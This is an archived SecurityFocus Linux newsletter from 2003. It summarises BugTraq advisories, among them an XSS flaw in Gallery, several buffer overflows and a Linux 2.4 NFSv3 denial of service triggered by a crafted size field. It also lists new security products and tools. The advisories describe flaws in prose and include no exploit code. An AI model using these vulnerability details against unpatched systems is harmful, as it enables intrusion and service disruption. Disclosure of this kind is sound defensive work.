SecurityFocus Linux Newsletter #143

SecurityFocus Linux Newsletter #143

This Issue is Sponsored by: SPI Dynamics

NEW ALERT:
"How a Hacker Launches a LDAP Injection Attack Step-by-Step"
It's as simple as placing additional LDAP query commands into a Web form input box giving hackers complete access to all your backend systems! Firewalls and IDS will not stop such attacks because LDAP Injections are seen as valid data. Download this *FREE* white paper from SPI Dynamics for a complete guide to protection!
http://www.securityfocus.com/SPIDynamics-linux-secnews8

I. FRONT AND CENTER

1. Maintaining System Integrity During Forensics
2. Firewall Evolution - Deep Packet Inspection
3. Betting on Malware II. LINUX VULNERABILITY SUMMARY
4. Gallery Search Engine Cross-Site Scripting Vulnerability
5. Valve Software Half-Life Dedicated Server Malformed Parameter...
6. FreeRadius Chap Remote Buffer Overflow Vulnerability
7. XBlast HOME Environment Variable Buffer Overflow Vulnerability
8. Multiple ManDB Utility Local Buffer Overflow Vulnerabilities
9. University of Minnesota GopherD Do_Command Buffer Overflow...
10. KDE Konqueror HTTP REFERER Authentication Credential Leak...
11. Valve Software Half-Life Dedicated Server Multiplayer Request...
12. Linux Kernel 2.4 XDR Packet Handler For NFSv3 Remote Denial Of...
13. XConq Multiple Environment Variable Buffer Overflow... III. LINUX FOCUS LIST SUMMARY
14. NO NEW POSTS FOR THE WEEK ENDING 08.01.03 IV. NEW PRODUCTS FOR LINUX PLATFORMS
15. CyberFusion
16. P-Synch Total Password Management Solution
17. WipeDrive
18. NEW TOOLS FOR LINUX PLATFORMS
19. Traffic tool Troll v1.01
20. GKrellM gamma v2.02
21. fscaps v2.6.0 VI. SPONSOR INFORMATION
22. FRONT AND CENTER

    ---

23. Maintaining System Integrity During Forensics By Jamie Morris

This article discusses best practices for maintaining system integrity during forensic examinations.

http://www.securityfocus.com/infocus/1717

2. Firewall Evolution - Deep Packet Inspection By Ido Dubrawsky

Deep Packet Inspection can be seen as the integration of Intrusion Detection (IDS) and Intrusion Prevention (IPS) capabilities with traditional stateful firewall technology.

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

http://www.securityfocus.com/infocus/1716

3. Betting on Malware
By George Smith

DARPA's plan to create a futures market for terrorist activities is dead, but the concept is a natural for predicting viruses and worms.

http://www.securityfocus.com/columnists/176

II. BUGTRAQ SUMMARY

1. Gallery Search Engine Cross-Site Scripting Vulnerability BugTraq ID: 8288 Remote: Yes Date Published: Jul 27 2003 12:00AM Relevant URL: http://www.securityfocus.com/bid/8288 Summary:

Gallery is a web-based photo album. It is written in PHP and is available for Linux and Unix variants as well as Microsoft Windows operating systems.

Gallery is prone to a cross-site scripting vulnerability. This issue is present in the search engine (search.php) facility provided by the software. Input supplied to the search engine via URI parameters is not sufficiently sanitized of HTML or script code before being echoed back to users, allowing for cross-site scripting attacks.

An attacker could exploit this issue by constructing a malicious link to the search engine that contains hostile HTML and script code. Attacker-supplied code could be rendered in the browser of a user who follows such a link. This would occur in the security context of the site hosting the vulnerable software.

Do you need more help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

2. Valve Software Half-Life Dedicated Server Malformed Parameter Loop Denial Of Service Vulnerability
BugTraq ID: 8301
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8301
Summary:

Half-Life is a game distributed and maintained by Valve Software. It includes features that allow users to game locally or across a network. The game engine is used in many modifications.

Half-Life servers are prone to a denial of service that may be exploited by a malicious client. By supplying malformed parameters in a client packet during a request to join a multiplayer game, it may be possible to cause a loop within the server program. This would result in a crash of the vulnerable server.

This vulnerability affects the server bundled with Half-Life and the free Dedicated Server for both Windows and Linux operating systems.

3. FreeRadius Chap Remote Buffer Overflow Vulnerability BugTraq ID: 8282
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8282
Summary:

FreeRADIUS is a freely available, open source implementation of the RADIUS protocol. It is available for the Unix and Linux operating systems.

A problem with FreeRADIUS has been reported when handling CHAP requests. Because of this, an attacker may be able to gain unauthorized access to a system using the vulnerable software.

Specific details about the vulnerability are not currently available. It is known that the problem in CHAP may be exploited to execute code with the privileges of the FreeRADIUS server. This could give the attacker access to the system with the privileges of the FreeRADIUS server.

Can we help you?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

4. XBlast HOME Environment Variable Buffer Overflow Vulnerability BugTraq ID: 8296
Remote: No
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8296
Summary:

XBlast is a multi-player arcade game available for Windows and various Linux distributions.

A locally exploitable buffer overflow vulnerability has been reported in XBlast 2.6.1.

XBlast does not perform adequate bounds checking on input supplied via the HOME environment variable. Successful exploitation can lead to arbitrary code execution. XBlast is typically installed setgid games on Linux systems, making it possible to exploit this issue to gain these privileges.

5. Multiple ManDB Utility Local Buffer Overflow Vulnerabilities BugTraq ID: 8303
Remote: No
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8303
Summary:

mandb is a utility that is used to initialize or manually update the index database caches that are usually maintained by the man utility.

mandb has been reported to be affected by multiple buffer overflow vulnerabilities.

These issues present themselves in the ult_src(), add_to_dirlist(), test_for_include() functions and in the PATH/MANPATH argument handler of mandb.

Can't find what you're looking for?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

The issues are due to insufficient bounds checking performed on user-supplied data before it is copied into reserved buffers in memory. A local attacker may supply excessive data in a manner sufficient to trigger these issues and in doing so corrupt arbitrary memory. It has been conjectured that an attacker may ultimately exploit this issue to execute arbitrary instructions, with elevated privileges.

Code execution would occur in the context of the mandb utility, typically user 'man'.

This BID will be split up into unique BIDs as these issues are analyzed in further detail.

6. University of Minnesota GopherD Do_Command Buffer Overflow Vulnerability BugTraq ID: 8283
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8283
Summary:

gopherd is the implementation of the Gopher Protocol Daemon by the University of Minnesota. It is available for the Unix and Linux platforms.

It has been reported that University of Minnesota gopherd is vulnerable to a remotely exploitable boundary condition error. This may make it possible for an attacker to gain unauthorized access to a host using the vulnerable software.

The problem is in the do_command function of the Gopherd.c file. Due to insufficient bounds checking on the user-supplied data, it is possible for an attacker to overwrite sensitive process memory. This could result in the execution of arbitrary instructions with the privileges of the gopher daemon process.

7. KDE Konqueror HTTP REFERER Authentication Credential Leak Vulnerability BugTraq ID: 8297
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8297
Summary:

Don't know where to look next?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

Konqueror is a freely available, open source web browser distributed and maintained by the KDE project. It is available for the Unix and Linux operating systems.

It has been reported that a problem in KDE Konqueror may result in the leak of authentication credentials through the HTTP REFERER header field. This could result in an attacker gaining unauthorized access to authentication information.

When a user visits a site that keeps the authentication credentials in the URL, the browser will pass the authentication credentials to the site at the end of the URL through the referrer log. This could result in unauthorized access to the user account of the referring page site.

8. Valve Software Half-Life Dedicated Server Multiplayer Request Buffer Overflow Vulnerability
BugTraq ID: 8300
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8300
Summary:

Half-Life is a game distributed and maintained by Valve Software. It includes features that allow users to game locally or across a network. The game engine is used in many modifications.

Half-Life servers are prone to a buffer overflow that may be exploited by a malicious client. By supplying overly long parameters supplied in a client packet during a request to join a multiplayer game, it may be possible to corrupt adjacent locations of stack memory with attacker-supplied data. This could allow for code execution in the context of the vulnerable server. It should be noted that the type of data sent may be restricted by the Half-Life protocol, which may make exploitation more difficult, as certain characters will not be permitted in the client request.

This vulnerability affects the server bundled with Half-Life and the free Dedicated Server for both Windows and Linux operating systems.

9. Linux Kernel 2.4 XDR Packet Handler For NFSv3 Remote Denial Of Service Vulnerability
BugTraq ID: 8298
Remote: Yes
Date Published: Jul 29 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8298
Summary:

Confused? Frustrated?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

XDR (External Data Representation) is a protocol governing the platform independent description and encoding of data, in this particular case it is used in conjunction with the Linux implementation of NFSv3 (Network File System), used to share system based resources across a network. NFS uses XDR to describe the format of its data.

Linux Kernel 2.4 XDR handler routines for NFSv3 have been reported prone to a remote denial of service vulnerability.

The issue presents itself in the decode_fh XDR handler routine contained in the nfs3xdr.c kernel source file. The issue is due to a signed/unsigned mismatch, when processing the size field of an XDR packet.

A malicious attacker may bypass the following signed sanity check arithmetic (if (size > NFS3_FHSIZE) of the decode_fh XDR handler routine, by crafting an XDR packet that contains a negative two's compliment representation of -1, or 0xFFFFFFFF. This value will be passed to a memcpy() function that uses the unsigned value of 0xFFFFFFFF or (4 GB), as its size parameter, the massive memcpy operation will trigger a kernel panic.

It has been reported that the target host may need an accessible exported directory, if this vulnerability is to be successfully exploited. It should be noted that other methods to trigger the vulnerability might also be possible.

This vulnerability has been reported to affect the Linux 2.4 kernel tree.

1. XConq Multiple Environment Variable Buffer Overflow Vulnerabilities BugTraq ID: 8307 Remote: No Date Published: Jul 29 2003 12:00AM Relevant URL: http://www.securityfocus.com/bid/8307 Summary:

xcong is a multiplayer game that is available for a number of Unix/Linux variants.

Multiple locally exploitable buffer overflows have been reported in xconq. This is due to insufficient bounds checking of data supplied via the USER and DISPLAY environment variables. This may permit a local attacker to corrupt adjacent regions of stack memory with specific values, allowing execution of arbitrary code in the context of the program, which is typically installed setgid 'games'.

Call Pantek today for Open Source Technical Support at 1-877-546-8934 - 24/7/365

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

This issue appears similar to BID 1495. Further analysis of these issues may determine that the issues are identical, in which case this BID will be retired and the earlier BID will be updated.

III. LINUX FOCUS LIST SUMMARY

1. NO NEW POSTS FOR THE WEEK ENDING 08.01.03

1. CyberFusion by Proginet Corp Platforms: AIX, HP-UX, Linux, OS/390, Solaris, SunOS, Windows 2000, Windows 95/98, Windows NT, Windows XP Relevant URL: http://www.proginetuk.co.uk/products/cyberfusion/cyberfusion.htm Summary:

CyberFusion enables secure, reliable, scalable, automated and comprehensive end-to-end management for secure file transfer across an extensive range of disparate computing platforms, including all mainframes and client/server environments. CyberFusion also provides extensive auditing, reporting and monitoring of activity. Secure file transfers for data backup, data recovery, disaster recovery, data archiving, data warehouse and other purposes are all easily enabled using the many features which offer much more than basic secure FTP (SFTP) or Secure Shell (SSH). Standard FTP software is not the cheap option it appears when total cost of ownership (TCO) is properly examined and the improved computer security is taken into account.

2. P-Synch Total Password Management Solution by M-TECH
Platforms: AIX, DG-UX, HP-UX, IRIX, Linux, MVS, Netware, Solaris, SunOS, VMS, Windows NT
Relevant uRL:
http://www.p-synch.com/
Summary:

P-Synch is a total password management solution. It is intended to reduce the cost of ownership of password systems, and simultaneously improve the security of password protected systems. This is done through: -Password Synchronization. -Enforcing an enterprise wide password strength policy. -Allowing authenticated users to reset their own forgotten passwords and enable their locked out accounts. -Streamlining help desk call resolution for password resets. P-Synch is available for both internal use, on the corporate Intranet, as well as for the Internet deployment in B2B and B2C applications.

3. WipeDrive
by AccessData
Platforms: DOS, Linux, OS/2, UNIX, Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL:
http://www.accessdata.com/Product07_Overview.htm?ProductNum=07 Summary:

Completely Eliminate Hard Drive Data

V. NEW TOOLS FOR LINUX PLATFORMS

1. Traffic tool Troll v1.01 by Alexander Newald alexander@newald.de Relevant URL: http://linux.newald.de/ Platforms: N/A Summary:

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

The Traffik Tool Troll is a traffic monitoring and managing skript. Traffic statistics are generated by port, hour, day, month, and year. You can define a special period for your needs. The script is written in Perl and uses iptables and MySQL to get and store the traffic.

2. GKrellM gamma v2.02
by Gregory Thiemonge gregory.thiemonge@libertysurf.fr Relevant URL:
http://gthiemonge.free.fr/gkrellm-gamma
Platforms: Linux
Summary:

Gkrellm gamma is a Gkrellm plugin which allows you to control your monitor's gamma correction with XFree86 (as xgamma).

3. fscaps v2.6.0
by Olaf Dietsche
Relevant URL:
http://www.olafdietsche.de/linux/capability/ Platforms: Linux
Summary:

fscaps implements filesystem capabilities for the Linux operating system (2.5 and up). With filesystem capabilities, you will be able to grant selective privileges to executables on a needed basis. This means there is no need anymore to run executables as root or as a suid root binary.

VI. SPONSOR INFORMATION

NEW ALERT:
"How a Hacker Launches a LDAP Injection Attack Step-by-Step"
It's as simple as placing additional LDAP query commands into a Web form input box giving hackers complete access to all your backend systems! Firewalls and IDS will not stop such attacks because LDAP Injections are seen as valid data. Download this *FREE* white paper from SPI Dynamics for a complete guide to protection!
http://www.securityfocus.com/SPIDynamics-linux-secnews8